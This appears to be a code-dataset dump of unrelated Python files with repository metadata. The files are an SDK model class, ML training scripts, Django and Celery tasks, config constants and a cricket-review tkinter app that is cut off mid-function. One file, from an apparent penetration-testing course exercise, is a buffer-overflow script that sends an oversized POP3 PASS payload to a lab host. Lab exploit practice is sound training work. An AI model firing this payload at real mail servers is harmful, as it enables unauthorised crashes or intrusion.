# pylint: disable=too-many-return-statements
# pylint: disable=too-many-statements
# pylint: disable=unused-import
from __future__ import annotations
from typing import Any, Dict, List, Optional, Tuple, Union
from ....core import Model
class ClientRequestParameter(Model):
"""Client request parameter (ClientRequestParameter)
Properties:
currency_code: (currencyCode) OPTIONAL str
language: (language) OPTIONAL str
price: (price) OPTIONAL float
region: (region) OPTIONAL str
"""
# region fields
currency_code: str # OPTIONAL
language: str # OPTIONAL
price: float # OPTIONAL
region: str # OPTIONAL
# endregion fields
# region with_x methods
def with_currency_code(self, value: str) -> ClientRequestParameter:
self.currency_code = value
return self
def with_language(self, value: str) -> ClientRequestParameter:
self.language = value
return self
def with_price(self, value: float) -> ClientRequestParameter:
self.price = value
return self
def with_region(self, value: str) -> ClientRequestParameter:
self.region = value
return self
# endregion with_x methods
# region to methods
def to_dict(self, include_empty: bool = False) -> dict:
result: dict = {}
if hasattr(self, "currency_code"):
result["currencyCode"] = str(self.currency_code)
elif include_empty:
result["currencyCode"] = ""
if hasattr(self, "language"):
result["language"] = str(self.language)
elif include_empty:
result["language"] = ""
if hasattr(self, "price"):
result["price"] = float(self.price)
elif include_empty:
result["price"] = 0.0
if hasattr(self, "region"):
result["region"] = str(self.region)
elif include_empty:
result["region"] = ""
return result
# endregion to methods
# region static methods
@classmethod
def create(
cls,
currency_code: Optional[str] = None,
language: Optional[str] = None,
price: Optional[float] = None,
region: Optional[str] = None,
**kwargs,
) -> ClientRequestParameter:
instance = cls()
if currency_code is not None:
instance.currency_code = currency_code
if language is not None:
instance.language = language
if price is not None:
instance.price = price
if region is not None:
instance.region = region
return instance
@classmethod
def create_from_dict(
cls, dict_: dict, include_empty: bool = False
) -> ClientRequestParameter:
instance = cls()
if not dict_:
return instance
if "currencyCode" in dict_ and dict_["currencyCode"] is not None:
instance.currency_code = str(dict_["currencyCode"])
elif include_empty:
instance.currency_code = ""
if "language" in dict_ and dict_["language"] is not None:
instance.language = str(dict_["language"])
elif include_empty:
instance.language = ""
if "price" in dict_ and dict_["price"] is not None:
instance.price = float(dict_["price"])
elif include_empty:
instance.price = 0.0
if "region" in dict_ and dict_["region"] is not None:
instance.region = str(dict_["region"])
elif include_empty:
instance.region = ""
return instance
@classmethod
def create_many_from_dict(
cls, dict_: dict, include_empty: bool = False
) -> Dict[str, ClientRequestParameter]:
return (
{k: cls.create_from_dict(v, include_empty=include_empty) for k, v in dict_}
if dict_
else {}
)
@classmethod
def create_many_from_list(
cls, list_: list, include_empty: bool = False
) -> List[ClientRequestParameter]:
return (
[cls.create_from_dict(i, include_empty=include_empty) for i in list_]
if list_
else []
)
@classmethod
def create_from_any(
cls, any_: any, include_empty: bool = False, many: bool = False
) -> Union[
ClientRequestParameter,
List[ClientRequestParameter],
Dict[Any, ClientRequestParameter],
]:
if many:
if isinstance(any_, dict):
return cls.create_many_from_dict(any_, include_empty=include_empty)
elif isinstance(any_, list):
return cls.create_many_from_list(any_, include_empty=include_empty)
else:
raise ValueError()
else:
return cls.create_from_dict(any_, include_empty=include_empty)
@staticmethod
def get_field_info() -> Dict[str, str]:
return {
"currencyCode": "currency_code",
"language": "language",
"price": "price",
"region": "region",
}
@staticmethod
def get_required_map() -> Dict[str, bool]:
return {
"currencyCode": False,
"language": False,
"price": False,
"region": False,
}
# endregion static methods
|
[
"elmernocon@gmail.com"
] |
elmernocon@gmail.com
|
5a8d87c8871f4b5879836b466e7049fd661da1ea
|
ca23b411c8a046e98f64b81f6cba9e47783d2584
|
/ncsnv3/main.py
|
d7a89ddfc89627cb854f233719729e3382012dce
|
[
"CC-BY-4.0",
"Apache-2.0"
] |
permissive
|
pdybczak/google-research
|
1fb370a6aa4820a42a5d417a1915687a00613f9c
|
0714e9a5a3934d922c0b9dd017943a8e511eb5bc
|
refs/heads/master
| 2023-03-05T23:16:11.246574
| 2021-01-04T11:30:28
| 2021-01-04T11:30:28
| 326,629,357
| 1
| 0
|
Apache-2.0
| 2021-02-01T12:39:09
| 2021-01-04T09:17:36
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 1,580
|
py
|
# coding=utf-8
# Copyright 2020 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Training and evaluation for NCSNv3."""
from . import ncsn_lib
from absl import app
from absl import flags
from ml_collections.config_flags import config_flags
import tensorflow as tf
FLAGS = flags.FLAGS
config_flags.DEFINE_config_file(
"config", None, "Training configuration.", lock_config=True)
flags.DEFINE_string("workdir", None, "Work unit directory.")
flags.DEFINE_string("mode", "train", "Running mode: train or eval")
flags.DEFINE_string("eval_folder", "eval",
"The folder name for storing evaluation results")
flags.mark_flags_as_required(["workdir", "config"])
def main(argv):
del argv
tf.config.experimental.set_visible_devices([], "GPU")
if FLAGS.mode == "train":
ncsn_lib.train(FLAGS.config, FLAGS.workdir)
elif FLAGS.mode == "eval":
ncsn_lib.evaluate(FLAGS.config, FLAGS.workdir, FLAGS.eval_folder)
else:
raise ValueError(f"Mode {FLAGS.mode} not recognized.")
if __name__ == "__main__":
app.run(main)
|
[
"copybara-worker@google.com"
] |
copybara-worker@google.com
|
20947ccf802631ec01474e52ab2310cf9b617690
|
9743d5fd24822f79c156ad112229e25adb9ed6f6
|
/xai/brain/wordbase/adjectives/_redoubtable.py
|
8645cb26ee8dbbcd8fcdc345eeb5befad16d369c
|
[
"MIT"
] |
permissive
|
cash2one/xai
|
de7adad1758f50dd6786bf0111e71a903f039b64
|
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
|
refs/heads/master
| 2021-01-19T12:33:54.964379
| 2017-01-28T02:00:50
| 2017-01-28T02:00:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 453
|
py
|
#calss header
class _REDOUBTABLE():
def __init__(self,):
self.name = "REDOUBTABLE"
self.definitions = [u'very strong, especially in character; producing respect and a little fear in others: ']
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.specie = 'adjectives'
def run(self, obj1, obj2):
self.jsondata[obj2] = {}
self.jsondata[obj2]['properties'] = self.name.lower()
return self.jsondata
|
[
"xingwang1991@gmail.com"
] |
xingwang1991@gmail.com
|
3f96d8878c3bb4206095f84b4f67f59194a2984b
|
4af65b44b39816c7037ff928da1ae153f4d970e5
|
/mud/thing.py
|
37a9732599722b87d944c6e390898be6dba87f1c
|
[] |
no_license
|
Cloudxtreme/mud-14
|
0745eda694ffeee79120fcfc82aab2da8b7a9655
|
f02d4ca0e8360b0924b86a3da99e5230c3028642
|
refs/heads/master
| 2021-05-28T06:14:37.121028
| 2014-12-01T08:00:27
| 2014-12-01T08:00:27
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 132
|
py
|
import mudclasses as mc
import event as evt
import english
from types import TupleType
# bug: permanence (sp?) is not yet handled
|
[
"leif.theden@gmail.com"
] |
leif.theden@gmail.com
|
8ee2d7c7cfec8a059e6c4f84dfb4a253e1464a52
|
89a90707983bdd1ae253f7c59cd4b7543c9eda7e
|
/python_cookbook/10/monkeypatching_modules_on_import1.py
|
89edccaa9b169b1d124990a2c3e05dd183a7d93b
|
[] |
no_license
|
timothyshull/python_reference_code
|
692a7c29608cadfd46a6cc409a000023e95b9458
|
f3e2205dd070fd3210316f5f470d371950945028
|
refs/heads/master
| 2021-01-22T20:44:07.018811
| 2017-03-17T19:17:22
| 2017-03-17T19:17:22
| 85,346,735
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 165
|
py
|
from postimport import when_imported
@when_imported('threading')
def warn_threads(mod):
print('Threads? Are you crazy?')
if __name__ == '__main__':
pass
|
[
"timothyshull@gmail.com"
] |
timothyshull@gmail.com
|
8fb6bfee4530acca0b7936e56a0c29ede098296b
|
2be5b2a6f5172b37fde90b076504fa9fe4f93784
|
/nosmsd/management/commands/nosmsd_incoming.py
|
a31a1677e93343f07145d84bad79c89cede66b3e
|
[] |
no_license
|
pedrokiefer/nosmsd
|
74b73e959b8482744531caf4f81e7515791a5ff3
|
e69d7f55d54f0f5e85eec16cde6da0cb64d63b5c
|
refs/heads/master
| 2021-01-14T13:17:11.680061
| 2014-11-25T13:34:31
| 2014-11-25T13:34:31
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 518
|
py
|
#!/usr/bin/env python
# encoding=utf-8
# maintainer: rgaudin
import sys
from django.conf import settings
from django.core.management.base import BaseCommand
from django.utils import translation
from nosmsd.nosmsd_incoming import handle as nohandle
class Command(BaseCommand):
def handle(self, *args, **options):
translation.activate(settings.DEFAULT_LOCALE)
args = (u"%s %s" % (sys.argv[0], u"nosmsd_incoming"),) + args
nohandle(*args, DJANGO=True)
translation.deactivate()
|
[
"rgaudin@gmail.com"
] |
rgaudin@gmail.com
|
28ef3309ea1c0af7d7c199ff4dfdcf9e68caf048
|
4254c7f88b95c7aec20979691aecf63053c97570
|
/cfdm/core/bounds.py
|
b3d70390051fcf096b1fe5d9ae2ad1b2f42f5528
|
[
"MIT"
] |
permissive
|
cofinoa/cfdm
|
2a1fc2069ef253c6eb4a71a4d1fa252295d9be1d
|
1e074dbc28054780a9ec667d61b9098b94956ea6
|
refs/heads/master
| 2020-05-07T08:39:24.996138
| 2019-04-08T14:34:56
| 2019-04-08T14:34:56
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,016
|
py
|
from builtins import super
from . import abstract
class Bounds(abstract.PropertiesData):
'''A cell bounds component of a coordinate or domain ancillary
construct of the CF data model.
An array of cell bounds spans the same domain axes as its coordinate
array, with the addition of an extra dimension whose size is that of
the number of vertices of each cell. This extra dimension does not
correspond to a domain axis construct since it does not relate to an
independent axis of the domain. Note that, for climatological time
axes, the bounds are interpreted in a special way indicated by the
cell method constructs.
.. versionadded:: 1.7.0
'''
def __init__(self, properties=None, data=None, source=None,
copy=True, _use_data=True):
'''**Initialization**
:Parameters:
properties: `dict`, optional
Set descriptive properties. The dictionary keys are property
names, with corresponding values. Ignored if the *source*
parameter is set.
*Parameter example:*
``properties={'standard_name': 'altitude'}``
Properties may also be set after initialisation with the
`set_properties` and `set_property` methods.
data: `Data`, optional
Set the data. Ignored if the *source* parameter is set.
The data also may be set after initialisation with the
`set_data` method.
source: optional
Override the *properties* and *data* parameters with
``source.properties()`` and ``source.get_data(None)``
respectively.
If *source* does not have one of these methods, then the
corresponding parameter is not set.
copy: `bool`, optional
If False then do not deep copy input parameters prior to
initialization. By default arguments are deep copied.
'''
super().__init__(properties=properties, data=data,
source=source, copy=copy)
#--- End: def
#--- End: class
|
[
"d.c.hassell@reading.ac.uk"
] |
d.c.hassell@reading.ac.uk
|
aaf0fcdaee70b39287fea8239def89eee1d419c9
|
ba54b70f93fe7f9d114623d76b1ad3f88309d66f
|
/uvideo/forms.py
|
99e3e96d880007e37a2d6a8887d3860983e0d765
|
[] |
no_license
|
loobinsk/newprj
|
9769b2f26092ce7dd8612fce37adebb307b01b8b
|
c6aa6a46973fb46375f4b05a86fe76207a8ae16d
|
refs/heads/master
| 2023-05-07T00:28:44.242163
| 2021-05-25T08:22:05
| 2021-05-25T08:22:05
| 370,617,690
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 619
|
py
|
#-*- coding: utf-8 -*-
from django import forms
from uvideo.models import UserVideo
from django.template import loader, Context
from gutils.forms import BootstrapFormMixin
class UploadVideoWidget(forms.HiddenInput):
def render(self, name, value, attrs=None):
tmpl = loader.get_template('uvideo/video-upload-input.html')
return tmpl.render(Context({
'input': super(UploadVideoWidget, self).render(name, value, attrs=None),
'id': name,
}))
class UserVideoForm(BootstrapFormMixin, forms.ModelForm):
class Meta:
model = UserVideo
fields = ['url']
|
[
"root@bazavashdom.ru"
] |
root@bazavashdom.ru
|
736e9e1a22663053a31a445dbb2ce7cecb2841c3
|
232fc2c14942d3e7e28877b502841e6f88696c1a
|
/ding/interaction/config/base.py
|
446e260203ff8119d34f20748b6d29698b85da7d
|
[
"Apache-2.0"
] |
permissive
|
shengxuesun/DI-engine
|
ebf84221b115b38b4b3fdf3079c66fe81d42d0f7
|
eb483fa6e46602d58c8e7d2ca1e566adca28e703
|
refs/heads/main
| 2023-06-14T23:27:06.606334
| 2021-07-12T12:36:18
| 2021-07-12T12:36:18
| 385,454,483
| 1
| 0
|
Apache-2.0
| 2021-07-13T02:56:27
| 2021-07-13T02:56:27
| null |
UTF-8
|
Python
| false
| false
| 432
|
py
|
# System configs
GLOBAL_HOST = '0.0.0.0'
LOCAL_HOST = '127.0.0.1'
# General request
DEFAULT_REQUEST_RETRIES = 5
DEFAULT_REQUEST_RETRY_WAITING = 1.0
# Slave configs
MIN_HEARTBEAT_SPAN = 0.2
DEFAULT_HEARTBEAT_SPAN = 3.0
DEFAULT_SLAVE_PORT = 7236
# Master configs
MIN_HEARTBEAT_CHECK_SPAN = 0.1
DEFAULT_HEARTBEAT_CHECK_SPAN = 1.0
DEFAULT_HEARTBEAT_TOLERANCE = 17.0
DEFAULT_MASTER_PORT = 7235
# Two-side configs
DEFAULT_CHANNEL = 0
|
[
"niuyazhe@sensetime.com"
] |
niuyazhe@sensetime.com
|
b2e4985b6430b407be3fe3d835729ebeb8aa2e69
|
facb8b9155a569b09ba66aefc22564a5bf9cd319
|
/wp2/era5_scripts/02_preprocessing/combine82/502-tideGauge.py
|
658865e7aebe194e5247d2a059242aa96349e091
|
[] |
no_license
|
moinabyssinia/modeling-global-storm-surges
|
13e69faa8f45a1244a964c5de4e2a5a6c95b2128
|
6e385b2a5f0867df8ceabd155e17ba876779c1bd
|
refs/heads/master
| 2023-06-09T00:40:39.319465
| 2021-06-25T21:00:44
| 2021-06-25T21:00:44
| 229,080,191
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,117
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Tue Apr 16 16:11:00 2020
--------------------------------------------
Load predictors for each TG and combine them
--------------------------------------------
@author: Michael Tadesse
"""
import os
import pandas as pd
#define directories
dir_in = '/lustre/fs0/home/mtadesse/eraFiveConcat'
dir_out = '/lustre/fs0/home/mtadesse/ereaFiveCombine'
def combine():
os.chdir(dir_in)
#get names
tg_list_name = os.listdir()
#cd to where the actual file is
os.chdir(dir_in)
x = 502
y = 503
for t in range(x, y):
tg_name = tg_list_name[t]
print(tg_name, '\n')
#looping through each TG folder
os.chdir(tg_name)
#defining the path for each predictor
where = os.getcwd()
csv_path = {'slp' : os.path.join(where, 'slp.csv'),\
"wnd_u": os.path.join(where, 'wnd_u.csv'),\
'wnd_v' : os.path.join(where, 'wnd_v.csv')}
first = True
for pr in csv_path.keys():
print(tg_name, ' ', pr)
#read predictor
pred = pd.read_csv(csv_path[pr])
#remove unwanted columns
pred.drop(['Unnamed: 0', 'Unnamed: 0.1'], axis = 1, inplace=True)
#give predictor columns a name
pred_col = list(pred.columns)
for pp in range(len(pred_col)):
if pred_col[pp] == 'date':
continue
pred_col[pp] = pr + str(pred_col[pp])
pred.columns = pred_col
#merge all predictors
if first:
pred_combined = pred
first = False
else:
pred_combined = pd.merge(pred_combined, pred, on = 'date')
#saving pred_combined
os.chdir(dir_out)
pred_combined.to_csv('.'.join([tg_name, 'csv']))
os.chdir(dir_in)
print('\n')
#run script
combine()
|
[
"michaelg.tadesse@gmail.com"
] |
michaelg.tadesse@gmail.com
|
5590c83b21209475b9f2d74cbf0f4aa8bc06fdf7
|
88023c9a62994e91291c67088156a2894cc26e9e
|
/corral/exceptions.py
|
6b957a785fc63342e2236f36930ddf95e737b7a0
|
[
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
toros-astro/corral
|
41e9d0224d734c4268bf5161d472b3c0375842f0
|
75474b38ff366330d33644461a902d07374a5bbc
|
refs/heads/master
| 2023-06-10T15:56:12.264725
| 2018-09-03T17:59:41
| 2018-09-03T17:59:41
| 44,282,921
| 6
| 5
|
BSD-3-Clause
| 2023-03-24T12:03:17
| 2015-10-14T23:56:40
|
Python
|
UTF-8
|
Python
| false
| false
| 1,745
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2016-2017, Cabral, Juan; Sanchez, Bruno & Berois, Martín
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
class ValidationError(Exception):
pass
class ImproperlyConfigured(ValueError):
pass
class DBError(Exception):
pass
|
[
"jbc.develop@gmail.com"
] |
jbc.develop@gmail.com
|
3314310b124324421bdc948e97abc2584f9cc2e0
|
30268e3918f8dc079a757e985fee374605c931b2
|
/api/tacticalrmm/winupdate/tasks.py
|
487b171e5b0bfbde2f2bdf9fc3fb94be0d93781c
|
[
"MIT"
] |
permissive
|
doytsujin/tacticalrmm
|
e1be7ad7950bb95c4b37dd63ac03eb323115d866
|
7fb79e0bcce62dbb892fb36665ff6d7135d7bebf
|
refs/heads/master
| 2021-03-21T14:02:24.858487
| 2020-02-24T07:11:15
| 2020-02-24T07:11:15
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,999
|
py
|
from time import sleep
from agents.models import Agent
from .models import WinUpdate
from tacticalrmm.celery import app
@app.task
def check_for_updates_task(pk, wait=False):
if wait:
sleep(60)
agent = Agent.objects.get(pk=pk)
resp = agent.salt_api_cmd(
hostname=agent.salt_id,
timeout=310,
salt_timeout=300,
func="win_wua.list",
arg="skip_installed=False",
)
data = resp.json()
ret = data["return"][0][agent.salt_id]
# if managed by wsus, nothing we can do until salt supports it
if type(ret) is str:
err = ["unknown failure", "2147352567", "2145107934"]
if any(x in ret.lower() for x in err):
agent.managed_by_wsus = True
agent.save(update_fields=["managed_by_wsus"])
return f"{agent.hostname} managed by wsus"
else:
# if previously managed by wsus but no longer (i.e moved into a different OU in AD)
# then we can use salt to manage updates
if agent.managed_by_wsus and type(ret) is dict:
agent.managed_by_wsus = False
agent.save(update_fields=["managed_by_wsus"])
guids = []
for k in ret.keys():
guids.append(k)
if not WinUpdate.objects.filter(agent=agent).exists():
for i in guids:
WinUpdate(
agent=agent,
guid=i,
kb=ret[i]["KBs"][0],
mandatory=ret[i]["Mandatory"],
title=ret[i]["Title"],
needs_reboot=ret[i]["NeedsReboot"],
installed=ret[i]["Installed"],
downloaded=ret[i]["Downloaded"],
description=ret[i]["Description"],
severity=ret[i]["Severity"],
).save()
else:
for i in guids:
# check if existing update install / download status has changed
if WinUpdate.objects.filter(agent=agent).filter(guid=i).exists():
update = WinUpdate.objects.filter(agent=agent).get(guid=i)
if ret[i]["Installed"] != update.installed:
update.installed = not update.installed
update.save(update_fields=["installed"])
if ret[i]["Downloaded"] != update.downloaded:
update.downloaded = not update.downloaded
update.save(update_fields=["downloaded"])
# otherwise it's a new update
else:
WinUpdate(
agent=agent,
guid=i,
kb=ret[i]["KBs"][0],
mandatory=ret[i]["Mandatory"],
title=ret[i]["Title"],
needs_reboot=ret[i]["NeedsReboot"],
installed=ret[i]["Installed"],
downloaded=ret[i]["Downloaded"],
description=ret[i]["Description"],
severity=ret[i]["Severity"],
).save()
return "ok"
|
[
"dcparsi@gmail.com"
] |
dcparsi@gmail.com
|
494aff1c24d6117476f11ab965437fac14f43806
|
20c80f722c451b64d05cc027b66a81e1976c3253
|
/commons/libs/pyblish/version.py
|
c978ffa548ff2ad57bbaba63dc1da19b5ff66f43
|
[] |
no_license
|
flypotatojun/Barbarian
|
2d3fcb6fcb1b4495b6d62fc5e32634abf4638312
|
efe14dd24c65b4852997dad1290e503211bcc419
|
refs/heads/master
| 2021-07-18T01:43:14.443911
| 2017-10-24T03:37:43
| 2017-10-24T03:37:43
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 229
|
py
|
VERSION_MAJOR = 1
VERSION_MINOR = 4
VERSION_PATCH = 3
version_info = (VERSION_MAJOR, VERSION_MINOR, VERSION_PATCH)
version = '%i.%i.%i' % version_info
__version__ = version
__all__ = ['version', 'version_info', '__version__']
|
[
"lonegather@users.noreply.github.com"
] |
lonegather@users.noreply.github.com
|
7003acb4f3816d60e19ac4b06f49d305dda66cfb
|
2cb120360192dfdf9afa233c8585232cb3df6e8c
|
/samples/tf_study/prettytensor/funcs/register.py
|
4d06d359b79901fe2eaade7d27002d9a528b7ee5
|
[] |
no_license
|
CosmosShadow/MLPythonLib
|
6323583bca8c6ff5757465fb1a0d5c4f23deb56c
|
3a2da2601330a032b737ff0addf71f679eeee94b
|
refs/heads/master
| 2020-05-21T15:08:58.082575
| 2017-04-30T17:03:15
| 2017-04-30T17:03:15
| 44,087,820
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 431
|
py
|
# coding: utf-8
import tensorflow as tf
import prettytensor as pt
import numpy as np
import cmtf.data.data_mnist as data_mnist
@pt.Register
def leaky_relu(input_pt):
return tf.select(tf.greater(input_pt, 0.0), input_pt, 0.01*input_pt)
x = tf.Variable([1, 2, 3, -3, -2, -1], dtype=tf.float32)
x_pretty = pt.wrap(x)
y = x_pretty.leaky_relu()
with tf.Session() as sess:
sess.run(tf.initialize_all_variables())
print(sess.run(y))
|
[
"lichenarthurml@gmail.com"
] |
lichenarthurml@gmail.com
|
d387d6b7108eb53681abf09eee7e082564d3f4cd
|
90a3c3ecfab0425f520115e049dc6e8476b72b7c
|
/toph/Set Union.py
|
6fdfa05cf4cd80906d7f77ed398ea2bb349d9a95
|
[] |
no_license
|
Manash-git/Competitive-Programming
|
f3e5f7a9bc202ec0a4667fe7f033f0013c8dfd83
|
bf79517699285c135bc126c5fabfd724e586460f
|
refs/heads/master
| 2022-12-05T19:37:11.814718
| 2020-08-24T19:16:30
| 2020-08-24T19:16:30
| 108,683,246
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 542
|
py
|
# n = {1,2,5}
# print(type(n))
# l= [1,5,6]
# print(type(set(l)))
# print(n | set(l))
# res = n | set(l)
# for i in res:
# print(i,end=" ")
n,m = input().split()
x = [int(i) for i in str(input()).split()]
y = [int(i) for i in str(input()).split()]
x= set(x)
y= set(y)
# print( set(x)| set(y))
res = sorted(list(x.union(y)))
print(res)
for i in res:
print(i,end=" ")
# for i in range(len(res)-1):
# print(res[i], end=" ")
# for i in range(len(res)):
# if i==len(res)-1:
# print(res[i])
# else:
# print(res[i],end=" ")
|
[
"emailatmanash@gmail.com"
] |
emailatmanash@gmail.com
|
5b2cd57f8e2194ec3817a24a6915598c622ca1b2
|
55c250525bd7198ac905b1f2f86d16a44f73e03a
|
/Python/Projects/sphinx/sphinx/sphinx/search/nl.py
|
485c32c00bfbebd3c13c6fc237cc638855547bc0
|
[
"LicenseRef-scancode-other-permissive",
"BSD-3-Clause"
] |
permissive
|
NateWeiler/Resources
|
213d18ba86f7cc9d845741b8571b9e2c2c6be916
|
bd4a8a82a3e83a381c97d19e5df42cbababfc66c
|
refs/heads/master
| 2023-09-03T17:50:31.937137
| 2023-08-28T23:50:57
| 2023-08-28T23:50:57
| 267,368,545
| 2
| 1
| null | 2022-09-08T15:20:18
| 2020-05-27T16:18:17
| null |
UTF-8
|
Python
| false
| false
| 130
|
py
|
version https://git-lfs.github.com/spec/v1
oid sha256:691f5261422e51d9e03272aae70ab30a0ad6712d65759be6a8f9a41bd904a565
size 21944
|
[
"nateweiler84@gmail.com"
] |
nateweiler84@gmail.com
|
ed8e7e07c105152f5bc9ba5fcc02fe65b2194e23
|
b0b9f05bcfb0e366955f70753bcbd0b7fc997e7a
|
/pairsWithSpecificSum.py
|
de68f3bf37ad2534a22358946844b725ef7cd5cc
|
[] |
no_license
|
mave5/pmarp
|
ae691e8fb3d7dc4cd51928ec240b077f09b27774
|
52aa9919e6384226ba10242144ceb5801a995071
|
refs/heads/master
| 2022-10-20T12:52:08.587884
| 2017-10-23T00:19:36
| 2017-10-23T00:19:36
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 698
|
py
|
# Merging 2 Packages
def get_indices_of_item_wights(arr, limit):
if len(arr)==1:
return []
#elif (len(arr)==2) and (arr[0]+arr[1]==limit):
#print arr[0],arr[1],arr[0]+arr[1]
#return []
comps={}
for i in range(0,len(arr)):
w=arr[i]
j=comps.get(lim-w)
if j is not None:
return [j,i]
else:
comps[w]=i
return []
arr = [4, 4]
lim = 8
print get_indices_of_item_wights(arr,lim)
#%%
# find a pair with specific sum
def findPairSum(arr,s):
first=0
last=len(arr)-1
while(first<last):
if (arr[first]+arr[last]>s):
last-=1
elif arr[first]+arr[last]<s:
first+=1
else:
return arr[first],arr[last]
return []
|
[
"mra446@gmail.com"
] |
mra446@gmail.com
|
cbeac3af8c846564c43834c3869b02822384413f
|
53b6b52a41ec415fec2a2d97cad524b8e9f8a4dc
|
/7_4_1/size.py
|
eb3ae38464d0a5f32857506357853e2ba0709ef4
|
[] |
no_license
|
xyalbino/pwk_exercises
|
56b8aa359b19487733c0a9b98b9d9ed668723365
|
c6af719381928164aee3c7ce8db685c7984269ec
|
refs/heads/master
| 2020-06-14T22:21:34.571883
| 2019-03-11T22:07:44
| 2019-03-11T22:07:44
| 195,143,280
| 1
| 0
| null | 2019-07-04T00:30:30
| 2019-07-04T00:30:30
| null |
UTF-8
|
Python
| false
| false
| 525
|
py
|
#!/usr/bin/env python
import socket, sys
if __name__ == '__main__':
buff = "A" * 2606 + "B" * 4 + "C" * (3500 - 2606 - 4)
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock_conn = sock.connect(("10.11.21.97", 110))
data = sock.recv(1024)
print data
sock.send("USER test\r\n")
data = sock.recv(1024)
print data
sock.send("PASS {0}\r\n".format(buff))
data = sock.recv(1024)
print data
except socket.error:
print("[x] Unable to connect...")
finally:
sock.close()
sys.exit(0)
|
[
"root@localhost.localdomain"
] |
root@localhost.localdomain
|
e4b6e1cda54c6b2fd375df3d4a64e7a4eae646c4
|
808b96265c56807d9b1ddcbd93af00988bc3d5c1
|
/main.py
|
8aca8d644d250287044cfd44e73b7f42b8313317
|
[] |
no_license
|
shivamdattapurkayastha99/drs-system
|
b1af2d087d5ac04294dcad3fcdb921d22a4b4b27
|
d35f347e6a8030c47dc0604490e360e4e63c1534
|
refs/heads/master
| 2023-07-06T18:35:33.594613
| 2021-08-10T20:20:20
| 2021-08-10T20:20:20
| 394,772,200
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,883
|
py
|
import tkinter
import cv2
import PIL.Image,PIL.ImageTk
from functools import partial
import threading
import imutils
import time
stream=cv2.VideoCapture('clip.mp4')
def play(speed):
print(f"You clicked on play.Speed is {speed}")
frame1=stream.get(cv2.CAP_PROP_POS_FRAMES)
stream.set(cv2.CAP_PROP_POS_FRAMES,frame1+speed)
grabbed,frame=stream.read()
frame=imutils.resize(frame,width=SET_WIDTH,height=SET_HEIGHT)
frame=PIL.ImageTk.PhotoImage(image=PIL.Image.fromarray(frame))
canvas.image=frame
canvas.create_image(0,0,image=frame,anchor=tkinter.NW)
canvas.create_text(120,25,fill="green",font="Times 20",text="Decision Pending")
def out():
thread=threading.Thread(target=pending,args=("out",))
thread.daemon=1
thread.start()
print("player is out")
def not_out():
thread=threading.Thread(target=pending,args=("not out",))
thread.daemon=1
thread.start()
print("player is not out")
def pending(decision):
frame=cv2.cvtColor(cv2.imread("pending.png"),cv2.COLOR_BGR2RGB)
frame=imutils.resize(frame,width=SET_WIDTH,height=SET_HEIGHT)
frame=PIL.ImageTk.PhotoImage(image=PIL.Image.fromarray(frame))
canvas.image=frame
canvas.create_image(0,0,image=frame,anchor=tkinter.NW)
time.sleep(1)
frame=cv2.cvtColor(cv2.imread("sponsor.png"),cv2.COLOR_BGR2RGB)
frame=imutils.resize(frame,width=SET_WIDTH,height=SET_HEIGHT)
frame=PIL.ImageTk.PhotoImage(image=PIL.Image.fromarray(frame))
canvas.image=frame
canvas.create_image(0,0,image=frame,anchor=tkinter.NW)
time.sleep(1.5)
if decision=='out':
decisionImg='out.png'
else:
decisionImg='not_out.png'
frame=cv2.cvtColor(cv2.imread(decisionImg),cv2.COLOR_BGR2RGB)
